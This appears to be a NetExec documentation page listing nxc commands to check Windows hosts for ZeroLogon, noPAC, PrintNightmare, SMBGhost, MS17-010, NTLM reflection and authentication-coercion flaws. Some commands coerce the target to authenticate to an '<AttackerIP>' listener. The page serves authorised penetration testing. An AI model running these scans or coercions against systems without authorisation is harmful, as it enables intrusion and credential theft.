Scan for Vulnerabilities
Check if host is vulnerable
Scan for Vulnerabilities
When you start your internal pentest, these are the first modules you should try:
ZeroLogon
nxc smb <ip> -u '' -p '' -M zerologonnoPAC
nxc smb <ip> -u 'user' -p 'pass' -M nopacYou need a credential for noPAC vulnerability check.
PrintNightmare
nxc smb <ip> -u '' -p '' -M printnightmareSMBGhost
nxc smb <ip> -u '' -p '' -M smbghostMS17-010 (Not tested outside LAB environment)
nxc smb <ip> -u '' -p '' -M ms17-010NTLM reflection (CVE-2025-33073)
nxc smb <ip> -u 'user' -p 'pass' -M ntlm_reflectionYou need credentials for CVE-2025-33073 vulnerability check.
Or, try them all at once! Just list each one: -M zerologon -M printnightmare
Scan for Coerce Vulnerabilities
You can check for coerce vulnerabilities such as PetitPotam, DFSCoerce, PrinterBug, MSEven and ShadowCoerce using the coerce_plus module. You can also use credentials to check for these vulnerabilities. By default the LISTENER ip will be set to localhost, so no traffic will appear on the network.
nxc smb <ip> -u '' -p '' -M coerce_plusIf a vulnerability is found, you can set a LISTENER ip to coerce the connection.
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP>To run all exploit methods at once, add the ALWAYS=true option, otherwise it will stop if the underlying RPC connection reports a successful coercion.
nxc smb <ip> -u '' -p '' -M coerce_plus -o LISTENER=<AttackerIP> ALWAYS=trueYou can also check for a specific coerce method by specifying it:
nxc smb <ip> -u '' -p '' -M coerce_plus -o METHOD=PetitPotamInstead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with ‘p’ so modules gives error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
Check out what other modules are available via nxc <protocol> -L
Last updated
Was this helpful?